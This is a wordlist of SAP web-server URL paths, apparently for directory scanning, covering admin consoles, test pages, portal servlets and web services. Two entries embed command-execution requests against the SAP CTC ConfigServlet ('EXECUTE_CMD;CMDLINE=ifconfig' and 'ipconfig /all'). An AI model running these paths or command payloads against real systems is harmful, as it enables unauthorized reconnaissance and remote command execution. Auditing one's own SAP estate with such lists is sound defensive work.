|
||||
/sap/bc/bsp/sap/spi_monitor
|
||||
/sap/bc/bsp/sap/sxms_alertrules
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/thtmlb_scripts
|
||||
/sap/bc/bsp/sap/thtmlb_styles
|
||||
/sap/bc/bsp/sap/uicmp_ltx
|
||||
/sap/bc/bsp/sap/xmb_bsp_log
|
||||
/sap/bc/contentserver
|
||||
/sap/bc/echo
|
||||
/sap/bc/erecruiting/applwzd
|
||||
/sap/bc/erecruiting/confirmation_e
|
||||
/sap/bc/erecruiting/confirmation_i
|
||||
/sap/bc/erecruiting/dataoverview
|
||||
/sap/bc/erecruiting/password
|
||||
/sap/bc/erecruiting/posting_apply
|
||||
/sap/bc/erecruiting/qa_email_e
|
||||
/sap/bc/erecruiting/qa_email_i
|
||||
/sap/bc/erecruiting/registration
|
||||
/sap/bc/erecruiting/startpage
|
||||
/sap/bc/erecruiting/verification
|
||||
/sap/bc/error
|
||||
/sap/bc/FormToRfc
|
||||
/sap/bc/FormToRfc/soap
|
||||
/sap/bc/graphics/net
|
||||
/sap/bc/gui/sap/its/CERTREQ
|
||||
/sap/bc/gui/sap/its/designs
|
||||
/sap/bc/gui/sap/its/webgui
|
||||
/sap/bc/IDoc_XML
|
||||
/sap/bc/Mi_host_http
|
||||
/sap/bc/MIDSD
|
||||
/sap/bc/Mime
|
||||
/sap/bc/MJC
|
||||
/sap/bc/MJC/
|
||||
/sap/bc/MJC/mi_host
|
||||
/sap/bc/MJC/mi_mds
|
||||
/sap/bc/MJC/mi_service
|
||||
/sap/bc/MJC/mi_services
|
||||
/sap/bc/MY_NEW_SERV99
|
||||
/sap/bc/ping
|
||||
/sap/bc/report
|
||||
/sap/bc/soap/ici
|
||||
/sap/bc/soap/rfc
|
||||
/sap/bc/srt/IDoc
|
||||
/sap/bc/wdvd
|
||||
/sap/bc/webdynpro/sap/apb_launchpad
|
||||
/sap/bc/webdynpro/sap/apb_launchpad_nwbc
|
||||
/sap/bc/webdynpro/sap/apb_lpd_light_start
|
||||
/sap/bc/webdynpro/sap/apb_lpd_start_url
|
||||
/sap/bc/webdynpro/sap/appl_log_trc_viewer
|
||||
/sap/bc/webdynpro/sap/appl_soap_management
|
||||
/sap/bc/webdynpro/sap/application_exit
|
||||
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
|
||||
/sap/bc/webdynpro/sap/cnp_light_test
|
||||
/sap/bc/webdynpro/sap/configure_application
|
||||
/sap/bc/webdynpro/sap/configure_component
|
||||
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_eng_modelling
|
||||
/sap/bc/webdynpro/sap/esh_search_results.ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_appls
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
|
||||
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_appl
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_comp
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_user
|
||||
/sap/bc/webdynpro/sap/wdhc_application
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
|
||||
/sap/bc/webdynpro/sap/wdr_test_popups_rt
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
|
||||
/sap/bc/webdynpro/sap/wdr_test_ui_elements
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
|
||||
/sap/bc/webrfc
|
||||
/sap/bc/xrfc
|
||||
/sap/bc/xrfc_test
|
||||
/sap/crm
|
||||
/sap/es/cockpit
|
||||
/sap/es/getdocument
|
||||
/sap/es/opensearch
|
||||
/sap/es/opensearch/description
|
||||
/sap/es/opensearch/list
|
||||
/sap/es/opensearch/search
|
||||
/sap/es/redirect
|
||||
/sap/es/saplink
|
||||
/sap/es/search
|
||||
/sap/IStest
|
||||
/sap/monitoring/
|
||||
/sap/public/bc
|
||||
/sap/public/bc
|
||||
/sap/public/bc/icons
|
||||
/sap/public/bc/icons_rtl
|
||||
/sap/public/bc/its
|
||||
/sap/public/bc/its/designs
|
||||
/sap/public/bc/its/mimes
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mobile/itsmobile00
|
||||
/sap/public/bc/its/mobile/itsmobile01
|
||||
/sap/public/bc/its/mobile/rfid
|
||||
/sap/public/bc/its/mobile/start
|
||||
/sap/public/bc/its/mobile/test
|
||||
/sap/public/bc/NW_ESH_TST_AUTO
|
||||
/sap/public/bc/NWDEMO_MODEL
|
||||
/sap/public/bc/pictograms
|
||||
/sap/public/bc/sicf_login_run
|
||||
/sap/public/bc/trex
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/wdtracetool
|
||||
/sap/public/bc/webdynpro
|
||||
/sap/public/bc/webdynpro/adobechallenge
|
||||
/sap/public/bc/webdynpro/mimes
|
||||
/sap/public/bc/webdynpro/ssr
|
||||
/sap/public/bc/webdynpro/viewdesigner
|
||||
/sap/public/bc/webicons
|
||||
/sap/public/bc/workflow
|
||||
/sap/public/bc/workflow/shortcut
|
||||
/sap/public/bsp
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp/sap/public/faa
|
||||
/sap/public/bsp/sap/public/graphics
|
||||
/sap/public/bsp/sap/public/graphics/jnet_handler
|
||||
/sap/public/bsp/sap/public/graphics/mimes
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/icf_check
|
||||
/sap/public/icf_info
|
||||
/sap/public/icf_info/icr_groups
|
||||
/sap/public/icf_info/icr_urlprefix
|
||||
/sap/public/icf_info/logon_groups
|
||||
/sap/public/icf_info/urlprefix
|
||||
/sap/public/icman
|
||||
/sap/public/icman/ping
|
||||
/sap/public/info
|
||||
/sap/public/myssocntl
|
||||
/sap/public/ping
|
||||
/sap/wdisp/admin
|
||||
/sap/wdvd
|
||||
/sap/webcuif
|
||||
/sap/webdynpro/sap/hap_main_document
|
||||
/sap/webdynpro/sap/hap_start_page_powl_ui_ess
|
||||
/sap/webdynpro/sap/hap_store_page_powl_ui_mss
|
||||
/sap/webdynpro/sap/hrtmc_employee_profile
|
||||
/sap/webdynpro/sap/hrtmc_rm_maintenance
|
||||
/sap/webdynpro/sap/hrtmc_ta_assessment
|
||||
/sap/webdynpro/sap/hrtmc_ta_dashboard
|
||||
/sap/webdynpro/sap/wd_analyze_config_user
|
||||
/SAPIKS
|
||||
/SAPIKS2
|
||||
/SAPIKS2/contentShow.sap
|
||||
/SAPIKS2/jsp/adminShow.jsp
|
||||
/SAPIrExtHelp
|
||||
/sapmc/sapmc.html
|
||||
/scripts/wgate
|
||||
/servlet/com.sap.admin.Critical.Actio
|
||||
/sim/
|
||||
/sim/config/testdata.jsp
|
||||
/sim/config/testerror.jsp
|
||||
/sim/index.html
|
||||
/SLDStart/plain
|
||||
/SLDStart/secure
|
||||
/socoview
|
||||
/socoview/flddisplay.asp
|
||||
/SQLtrace/index.html
|
||||
/sysconfig
|
||||
/tc.lm.webadmin.endtoend.public.app
|
||||
/tc/lm/webadmin/clusteradmin
|
||||
/teched/test
|
||||
/TestJDBC_Web
|
||||
/TOdbo
|
||||
/top.html
|
||||
/TSapq
|
||||
/TXmla
|
||||
/uddi/
|
||||
/uddiclient
|
||||
/uddiclient/jsps/index.jsp
|
||||
/uddiclient/process/
|
||||
/useradmin
|
||||
/userhome
|
||||
/utl/UsageTypesInfo
|
||||
/VC
|
||||
/vscantest/
|
||||
/webdynpro/dispatcher
|
||||
/webdynpro/dispatcher/
|
||||
/webdynpro/dispatcher/sap.com/grc~accvwdcomp
|
||||
/webdynpro/dispatcher/sap.com/grc~aewebquery
|
||||
/webdynpro/dispatcher/sap.com/grc~ccappcomp
|
||||
/webdynpro/dispatcher/sap.com/grc~ccxsysbe
|
||||
/webdynpro/dispatcher/sap.com/grc~ccxsysbehr
|
||||
/webdynpro/dispatcher/sap.com/grc~ffappcomp
|
||||
/webdynpro/dispatcher/sap.com/pb/pagebuilder
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
|
||||
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
|
||||
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
|
||||
/webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
|
||||
/webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
|
||||
/webdynpro/resources/sap.com/
|
||||
/webdynpro/welcome/Welcome.jsp
|
||||
/WSConnector/Config?wsdl
|
||||
/WSConnector/Config1
|
||||
/WSConnector/Config1?wsdl
|
||||
/wsd2wsdl
|
||||
/wsnavigator
|
||||
/wsnavigator/jsps/index.jsp
|
||||
/wsnavigator/jsps/redirect.jsp
|
||||
/wsnavigator/jsps/sendrequest.jsp
|
||||
/wsnavigator/jsps/test.jsp
|
||||
/wssproc/cert
|
||||
/wssproc/plain
|
||||
/wssproc/ssl
|
||||
/AdapterFramework/version/version.jsp
|
||||
/AdminTools/
|
||||
/Adobe
|
||||
/AdobeDocumentServices/Config
|
||||
/AdobeDocumentServices/Config?wsdl
|
||||
/AdobeDocumentServices/Grmg
|
||||
/AdobeDocumentServicesSec/Config
|
||||
/ADS-EJB
|
||||
/ADS-License
|
||||
/AE/index.jsp
|
||||
/AnalyticalReporting/
|
||||
/AnalyticalReporting/AnalyticalReporting_merge_web.xml
|
||||
/AnalyticalReporting/download/win32/websetup.properties
|
||||
/apidocs/
|
||||
/apidocs/allclasses-frame.html
|
||||
/apidocs/com/sap/engine/connector/connection/IConnection.html
|
||||
/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
|
||||
/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
|
||||
/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
|
||||
/ApplicationAdminProvider
|
||||
/bcb/
|
||||
/bcb/bcbadmHome.jsp
|
||||
/bcb/bcbadmNavigation.jsp
|
||||
/bcb/bcbadmSettings.jsp
|
||||
/bcb/bcbadmStart.jsp
|
||||
/bcb/bcbadmSystemInfo.jsp
|
||||
/bcbtest/start.jsp
|
||||
/BI_UDC
|
||||
/BizcCommLayerAuthoring/Config1
|
||||
/BizcCommLayerAuthoring/Config1?wsdl
|
||||
/BizcCommLayerAuthoring/Config?wsdl
|
||||
/bwtest
|
||||
/caf
|
||||
/CAFDataService/Config
|
||||
/CAFDataService/Config?wsdl
|
||||
/ccsui
|
||||
/CmcApp/logon.faces
|
||||
/CMSRTS/Config1
|
||||
/CMSRTS/Config1?wsdl
|
||||
/CMSRTS/Config?wsdl
|
||||
/com~tc~lm~webadmin~httpprovider~web
|
||||
/CrystalReports/viewrpt.cwr
|
||||
/ctc
|
||||
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
|
||||
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
|
||||
/DataArchivingService
|
||||
/dispatcher
|
||||
/@download@
|
||||
/dswsbobje
|
||||
/dswsbobje/services/BICatalog?wsdl
|
||||
/dswsbobje/services/listServices
|
||||
/examples/
|
||||
/examples_frame.html
|
||||
/examples.html
|
||||
/exchangeProfile/
|
||||
/GRMGHeartBeat
|
||||
/GRMGWSTest/service
|
||||
/GRMGWSTest/service?wsdl
|
||||
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
|
||||
/htmlb/
|
||||
/htmlb/docs/api/index.html
|
||||
/htmlb/index.html
|
||||
/htmlb/jsp/index.jsp
|
||||
/htmlb/moresamples.html
|
||||
/htmlb/samples.html
|
||||
/IciActionItemService/IciActionItemConf
|
||||
/IciActionItemService/IciActionItemConf?wsdl
|
||||
/IciChatLineService/IciChatLineConf
|
||||
/IciChatLineService/IciChatLineConf?wsdl
|
||||
/IciChatService/IciChatConf?wsdl
|
||||
/IciEventService/
|
||||
/IciEventService/IciEventConf
|
||||
/IciEventService/IciEventConf?wsdl
|
||||
/IciEventService/sap
|
||||
/IciFolderService/IciFolderConf
|
||||
/IciFolderService/IciFolderConf?wsdl
|
||||
/IciItemService/IciItemConf
|
||||
/IciItemService/IciItemConf?wsdl
|
||||
/IciMessageService/IciMessageConf
|
||||
/IciMessageService/IciMessageConf?wsdl
|
||||
/IciMonitorService/IciMonitorConf
|
||||
/IciMonitorService/IciMonitorConf?wsdl
|
||||
/IciPhoneCallService/IciPhoneCallConf
|
||||
/IciPhoneCallService/IciPhoneCallConf?wsdl
|
||||
/IciSystemService/IciSystemConf
|
||||
/IciSystemService/IciSystemConf?wsdl
|
||||
/IciUserService/IciUserConf
|
||||
/IciUserService/IciUserConf?wsdl
|
||||
/IGSCustomizingXML
|
||||
/index.html
|
||||
/InfoViewApp/
|
||||
/InfoViewApp/help/en/user/html/
|
||||
/InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
|
||||
/inspection.wsil
|
||||
/ipcpricing/ui/
|
||||
/irj
|
||||
/irj/go/km/docs
|
||||
/irj/portal
|
||||
/irj/portalapps
|
||||
/irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
|
||||
/irj/portalapps/com.sap.portal.design.portaldesigndata
|
||||
/irj/portalapps/com.sap.portal.design.urdesigndata
|
||||
/irj/portalapps/com.sap.portal.epcf.loader
|
||||
/irj/portalapps/com.sap.portal.navigation.detailedtree
|
||||
/irj/sdn/soa-discovery
|
||||
/irj/servlet
|
||||
/irj/servlet/prt
|
||||
/irj/servlet/prt/portal
|
||||
/irj/servlet/prt/portal/prtroot
|
||||
/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
|
||||
/irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
|
||||
/irj/servlet/prt/portal/prtroot/pcd!(*)
|
||||
/irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
|
||||
/KW
|
||||
/Lighthammer
|
||||
/logon
|
||||
/logon/index.jsp
|
||||
/logon/logonServlet
|
||||
/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
|
||||
/logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
|
||||
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
|
||||
/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
|
||||
/main.html
|
||||
/meSync/HttpGRMGTest.html
|
||||
/mmr/
|
||||
/mmr/mmr/MMRUI.html
|
||||
/Modeler
|
||||
/modeller/
|
||||
/modeller/index.html
|
||||
/monitoring
|
||||
/monitoring/SystemInfo
|
||||
/nwa
|
||||
/OpenSQLMonitors/
|
||||
/PerformacetraceTraceApplication
|
||||
/performanceProvierRoot
|
||||
/pmi
|
||||
/portal
|
||||
/portalapps
|
||||
/RE/index.jsp
|
||||
/rep/build_info.html
|
||||
/rep/build_info.jsp
|
||||
/rep/start/index.jsp
|
||||
/run/build_info.html
|
||||
/run/build_info.jsp
|
||||
/rwb/version.html
|
||||
/saml
|
||||
/samlssodemo_dest
|
||||
/samlssodemo_source
|
||||
/sap/
|
||||
/sap/admin
|
||||
/sap/admin/public/index.html
|
||||
/sap/ap
|
||||
/sap/bc/abap/demo
|
||||
/sap/bc/abap/demo_apc
|
||||
/sap/bc/abap/demo_apc_pcp
|
||||
/sap/bc/abap/demo_mime
|
||||
/sap/bc/abap/demo_post
|
||||
/sap/bc/abap/docu
|
||||
/sap/bc/abap/toolsdocu
|
||||
/sap/bc/adt
|
||||
/sap/bc/apc/sap/apc_tcp_test_stateful
|
||||
/sap/bc/apc/sap/apc_tcp_test_stateless
|
||||
/sap/bc/apc_test/abap_online_com
|
||||
/sap/bc/apc_test/file
|
||||
/sap/bc/apc_test/ping
|
||||
/sap/bc/apc_test/ping_ping
|
||||
/sap/bc/apc_test/ping_pong/game
|
||||
/sap/bc/apc_test/ping_pong/player
|
||||
/sap/bc/apc_test/sapui5_test
|
||||
/sap/bc/apc_test/sohbat
|
||||
/sap/bc/apc_test/system_info
|
||||
/sap/bc/batch/event_raise
|
||||
/sap/bc/bcs/sms
|
||||
/sap/bc/bsp/
|
||||
/sap/bc/bsp/esh_os_service/favicon.gif
|
||||
/sap/bc/bsp/ipro/editor
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap/alertinbox
|
||||
/sap/bc/bsp/sap/bsp_dlc_frcmp
|
||||
/sap/bc/bsp/sap/bsp_veri
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_wd_base
|
||||
/sap/bc/bsp/sap/bspwd_basics
|
||||
/sap/bc/bsp/sap/certmap
|
||||
/sap/bc/bsp/sap/certreq
|
||||
/sap/bc/bsp/sap/crm_bsp_frame
|
||||
/sap/bc/bsp/sap/crmcmp_bpident/
|
||||
/sap/bc/bsp/sap/crmcmp_brfcase
|
||||
/sap/bc/bsp/sap/crmcmp_hdr
|
||||
/sap/bc/bsp/sap/crmcmp_hdr_std
|
||||
/sap/bc/bsp/sap/crmcmp_ic_frame
|
||||
/sap/bc/bsp/sap/crm_ic_ise/editor
|
||||
/sap/bc/bsp/sap/crm_thtmlb_util
|
||||
/sap/bc/bsp/sap/crm_ui_frame
|
||||
/sap/bc/bsp/sap/crm_ui_start
|
||||
/sap/bc/bsp/sap/esh_sapgui_exe
|
||||
/sap/bc/bsp/sap/esh_sap_link
|
||||
/sap/bc/bsp/sap/graph_bsp_test
|
||||
/sap/bc/bsp/sap/graph_bsp_test/Mimes
|
||||
/sap/bc/bsp/sap/gsbirp
|
||||
/sap/bc/bsp/sap/hrrcf_wd_dovru
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/iccmp_bp_cnfirm
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnr
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnt
|
||||
/sap/bc/bsp/sap/iccmp_header
|
||||
/sap/bc/bsp/sap/iccmp_ssc_ll/
|
||||
/sap/bc/bsp/sap/ic_frw_notify
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/it00/default.htm
|
||||
/sap/bc/bsp/sap/it00/http_client.htm
|
||||
/sap/bc/bsp/sap/it00/http_client_xml.htm
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/public/FAA
|
||||
/sap/bc/bsp/sap/public/graphics
|
||||
/sap/bc/bsp/sap/public/sem
|
||||
/sap/bc/bsp/sap/sam_demo
|
||||
/sap/bc/bsp/sap/sam_notifying
|
||||
/sap/bc/bsp/sap/sam_sess_queue
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/spi_admin
|
||||
/sap/bc/bsp/sap/spi_monitor
|
||||
/sap/bc/bsp/sapsrm
|
||||
/sap/bc/bsp/sapsrm/bsp_dhtml_apple
|
||||
/sap/bc/bsp/sapsrm/bsp_java_applet
|
||||
/sap/bc/bsp/sapsrm/call_sig_ctrl
|
||||
/sap/bc/bsp/sapsrm/ctlg_wrapper
|
||||
/sap/bc/bsp/sap/sxms_alertrules
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/thtmlb_scripts
|
||||
/sap/bc/bsp/sap/thtmlb_styles
|
||||
/sap/bc/bsp/sap/uicmp_ltx
|
||||
/sap/bc/bsp/sap/xmb_bsp_log
|
||||
/sap/bc/contentserver
|
||||
/sap/bc/docu
|
||||
/sap/bc/echo
|
||||
/sap/bc/echo
|
||||
/sap/bc/erecruiting/applwzd
|
||||
/sap/bc/erecruiting/confirmation_e
|
||||
/sap/bc/erecruiting/confirmation_i
|
||||
/sap/bc/erecruiting/dataoverview
|
||||
/sap/bc/erecruiting/password
|
||||
/sap/bc/erecruiting/posting_apply
|
||||
/sap/bc/erecruiting/qa_email_e
|
||||
/sap/bc/erecruiting/qa_email_i
|
||||
/sap/bc/erecruiting/registration
|
||||
/sap/bc/erecruiting/startpage
|
||||
/sap/bc/erecruiting/verification
|
||||
/sap/bc/error
|
||||
/sap/bc/error
|
||||
/sap/bc/FormToRfc
|
||||
/sap/bc/FormToRfc/soap
|
||||
/sap/bc/graphics/net
|
||||
/sap/bc/gui/sap/its/CERTREQ
|
||||
/sap/bc/gui/sap/its/designs
|
||||
/sap/bc/gui/sap/its/webgui
|
||||
/sap/bc/IDoc_XML
|
||||
/sap/bc/MIDSD
|
||||
/sap/bc/Mi_host_http
|
||||
/sap/bc/Mime
|
||||
/sap/bc/MJC
|
||||
/sap/bc/MJC/
|
||||
/sap/bc/MJC/mi_host
|
||||
/sap/bc/MJC/mi_mds
|
||||
/sap/bc/MJC/mi_service
|
||||
/sap/bc/MJC/mi_services
|
||||
/sap/bc/MY_NEW_SERV99
|
||||
/sap/bc/ping
|
||||
/sap/bc/report
|
||||
/sap/bc/soap/ici
|
||||
/sap/bc/soap/rfc
|
||||
/sap/bc/srt/IDoc
|
||||
/sap/bc/ui5_ui5/ui2/ushell/shells/abap/Fiorilaunchpad.html?
|
||||
/sap/bc/ui5_ui5/ui2/ushell/shells/abap/Fiorilaunchpad.html?saml2=disabled
|
||||
/sap/bc/wdvd
|
||||
/sap/bc/wdvd/
|
||||
/sap/bc/webdynpro
|
||||
/sap/bc/webdynpro/sap/apb_launchpad
|
||||
/sap/bc/webdynpro/sap/apb_launchpad_nwbc
|
||||
/sap/bc/webdynpro/sap/apb_lpd_light_start
|
||||
/sap/bc/webdynpro/sap/apb_lpd_start_url
|
||||
/sap/bc/webdynpro/sap/application_exit
|
||||
/sap/bc/webdynpro/sap/appl_log_trc_viewer
|
||||
/sap/bc/webdynpro/sap/appl_soap_management
|
||||
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
|
||||
/sap/bc/webdynpro/sap/cnp_light_test
|
||||
/sap/bc/webdynpro/sap/configure_application
|
||||
/sap/bc/webdynpro/sap/configure_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
|
||||
/sap/bc/webdynpro/sap/esh_eng_modelling
|
||||
/sap/bc/webdynpro/sap/esh_search_results.ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_appls
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
|
||||
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_appl
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_comp
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_user
|
||||
/sap/bc/webdynpro/sap/wdhc_application
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
|
||||
/sap/bc/webdynpro/sap/wdr_test_popups_rt
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
|
||||
/sap/bc/webdynpro/sap/wdr_test_ui_elements
|
||||
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
|
||||
/sap/bc/webrfc
|
||||
/sap/bc/workflow/shortcut
|
||||
/sap/bc/xrfc
|
||||
/sap/bc/xrfc_test
|
||||
/sap/BSSP_SP_MAPS
|
||||
/sap/crm
|
||||
/sap/es/atk
|
||||
/sap/es/cockpit
|
||||
/sap/es/getdocument
|
||||
/sap/es/opensearch
|
||||
/sap/es/opensearch/description
|
||||
/sap/es/opensearch/list
|
||||
/sap/es/opensearch/search
|
||||
/sap/es/redirect
|
||||
/sap/es/saplink
|
||||
/sap/es/search
|
||||
/sap/gw
|
||||
/sap/gw/bep
|
||||
/sap/gw/jsonrpc
|
||||
/SAPIKS
|
||||
/SAPIKS2
|
||||
/SAPIKS2/contentShow.sap
|
||||
/SAPIKS2/jsp/adminShow.jsp
|
||||
/SAPIrExtHelp
|
||||
/sap/IStest
|
||||
/sapmc/sapmc.html
|
||||
/sap/monitoring/
|
||||
/sap/public
|
||||
/sap/public/bc
|
||||
/sap/public/bc/abap
|
||||
/sap/public/bc/abap/docu
|
||||
/sap/public/bc/abap/mime_demo
|
||||
/sap/public/bc/abap/toolsdocu
|
||||
/sap/public/bc/apc_test
|
||||
/sap/public/bc/apc_test/apc_tcp_test_sf
|
||||
/sap/public/bc/apc_test/apc_tcp_test_sl
|
||||
/sap/public/bc/AR_NEWS_REDRCT
|
||||
/sap/public/bc/bpo
|
||||
/sap/public/bc/bsp
|
||||
/sap/public/bc/clms
|
||||
/sap/public/bc/crm_cic_ipaddr
|
||||
/sap/public/bc/crm_cic_polling
|
||||
/sap/public/bc/dashboard
|
||||
/sap/public/bc/icf
|
||||
/sap/public/bc/icf/logoff
|
||||
/sap/public/bc/icons
|
||||
